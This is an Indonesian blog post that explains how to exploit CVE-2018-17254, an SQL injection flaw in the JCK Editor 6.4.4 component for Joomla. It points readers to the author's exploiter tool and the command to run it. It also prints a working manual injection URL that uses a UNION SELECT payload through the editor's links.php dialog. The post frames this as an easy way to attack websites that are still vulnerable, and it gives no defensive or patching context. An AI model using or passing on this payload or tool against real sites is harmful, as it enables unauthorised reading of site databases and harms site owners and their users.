Halo apa kabar semua, setelah sekian lama saya tidak menulis artikel di blog saya saya jadi kangen sama nulis di blog saya hehe, jadi di sini saya akan membahas tentang CVE-2018-17254 dan bagaimana cara mengeskploitasinya.

    Bug ini sebenarnya sudah lama tapi ya karena masih banyak website yang memungkinkan memiliki bug tersebut jadi saya akan membahasnya.

    Deskripsi

    The JCK Editor component 6.4.4 for Joomla! memungkinkan untuk melakukan SQL injection di website tersebut.

    Jika website tersebut rentan SQL injection maka dapat melihat database website tersebut, waduhh bahayaa.

    Eksploitasi

    Jadi bagaimana cara eksplotasi bug tersebut? terdapat 2 cara yaitu menggunakan tools atau bahkan manual.

    Cara Pertama

    menggunakan tools, yang pertama adalah unduh dulu tools CVE-2018-17254 Exploiter dari Github saya (Klik Di sini)

    Langkah kedua jalankan tools tersebut menggunakan CMD atau juga terminal, lalu jalan file tersebut dengan command :

php CVE-2018-17254.php

     Tinggal ikutin saja command yang ada di tools tersebut:)

    Cara Ke Dua

    Yup dengan cara manual pasti capek bukan dengan cara yang kedua:) makanya cara menggunakan tools saya jadiin yang pertama hehe

    Caranya yaitu :

Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

Itu dia bagimana cara mengeksploitasi bug CVE-2018-17254 mudah bukan? hehe jangan lupa share artikel ini jika di rasa bermanfaat :) terimakasih.